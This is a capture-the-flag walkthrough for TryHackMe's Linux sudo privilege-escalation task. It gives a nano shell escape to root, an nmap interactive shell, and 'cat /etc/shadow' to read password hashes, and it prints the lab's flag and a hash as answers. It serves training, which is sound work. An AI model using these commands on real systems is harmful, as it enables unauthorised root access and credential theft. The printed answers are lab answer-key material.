TryHackMe - Linux Privilege Escalation: Sudo

This article discusses the solution for TryHackMe's Linux Privilege Escalation Kernel Sudo tasks so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation SUDO Solution

Notes:

• A user may be given sudo privileges for specific applictions.

• Can use these programs to execute sudo commands

• Refer to GTFO BINS for reference.

• Also check LD_PRELOAD exploit.

How many programs can the user "karen" run on the target system with sudo rights?

1. Execute sudo -l

Answer:3

What is the content of the flag2.txt file?

1. Let's go to https://gtfobins.github.io/#+sudo. Based on the previous question above we have a sudo exploit for nano. https://gtfobins.github.io/gtfobins/nano/#sudo

    sudo nano
   

   The inside the nano editor execute the following:

    ^R^X
    reset; sh 1>&0 2>&0
   

   

2. We will have a terminal with root access within nano.

Answer: THM-402028394

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

1. Again go to https://gtfobins.github.io/#+sudo, and lookup nmap.

Answer: sudo nmap --interactive

What is the hash of frank's password?

1. Execute the following command and look for frank's password hash. (still using the terminal inside nano).

cat /etc/shadow

Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1

Until next time. Keep learning.

Stay stoked and code. :)

---

I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)